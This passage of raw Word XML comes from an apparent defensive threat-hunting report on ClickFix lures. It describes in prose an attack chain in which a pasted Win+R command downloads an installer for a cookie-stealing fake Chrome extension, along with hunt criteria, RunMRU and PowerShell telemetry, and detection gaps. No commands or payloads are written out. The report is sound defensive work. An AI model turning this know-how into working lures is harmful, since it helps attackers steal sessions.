        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> launched by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with a download command, and the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4 writes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RunMRU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> key: the original paste and three retries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The command downloaded an MSI installer and, in under 30 seconds, installed a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fake Chrome extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> able to steal cookies and hijack sessions. There was no persistence in the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">three command-and-control (C2) channels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Only one was on a reputation list, and it was the only one blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The only alert arrived at T+4:51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, triggered by that block. The five previous steps were in the telemetry as ordinary events, with no alert at all.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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Additional findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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The hunt leaves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 behavioral detections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that do not depend on IPs or hashes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 visibility gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> declared, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 new hypothesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the next hunt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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We documented </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2 false positives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Microsoft Copilot and WebView2) as justified exclusions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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hsg34282h7ef" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HUNTING HYPOTHESIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hypothesis:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if any user in the fleet pasted a command from a ClickFix lure into Win+R, Defender for Endpoint will show an interpreter (PowerShell, cmd, mshta) launched by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(or by the browser, in the FileFix variant) with a download command; if it was Win+R, the same line written to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RunMRU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> key; and, seconds later, the chain that command triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hypothesis is written so that the data can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirm or refute it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. That is why the following criteria were defined in advance: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6729"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2300"/>
            <w:gridCol w:w="67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29">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</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2A">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Content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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trigger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40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ClickFix accounted for 47% of the initial access cases handled by Microsoft Defender Experts, and 4 out of 5 cases arrive from a search engine, not from email.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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Why it is plausible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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">It can happen to any user searching for something free online. And the pattern (an interpreter with a download command, launched by explorer.exe) repeats even when IPs and hashes change; Win+R also leaves a trace in RunMRU.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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Defender for Endpoint process, registry (RunMRU), network and file events, plus PowerShell Script Block Logging (event 4104), queried in Microsoft Sentinel across the entire fleet: the events, not the alerts.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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Positive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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Before calling anything refuted, each query is tested with a test Win+R run on a lab machine, after confirming in DeviceInfo that the machine is sending telemetry. Zero results without a positive control prove nothing.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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirmed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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A host with an interpreter launched by explorer.exe with a download command (query 1), the same line in RunMRU (query 1b) and the chain that command triggers.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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Refuted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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Zero results in queries 1 and 1b, with both already validated against the positive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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Known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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">RunMRU only sees what is pasted into Win+R. FileFix runs the command from the browser, and query 1 covers it through lineage. A command pasted into an already open console (cmd, PowerShell or the Win+X Terminal) does not have explorer.exe as its parent and, in PowerShell, does not even show up as a command line: only Script Block Logging records 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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ATT&amp;CK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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1204.004 (Malicious Copy and Paste) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1059.001 (PowerShell).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The methodology applied is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intelligence-driven, hypothesis-based Threat Hunting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hypothesis-driven), following the PEAK framework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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y7qgchtrmm4" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCOPE AND LIMITATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exercise was limited to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Defender for Endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and PowerShell telemetry available in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Sentinel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for XXXX. Alerts were not used as a starting point.</w:t>
      </w:r>
    </w:p>
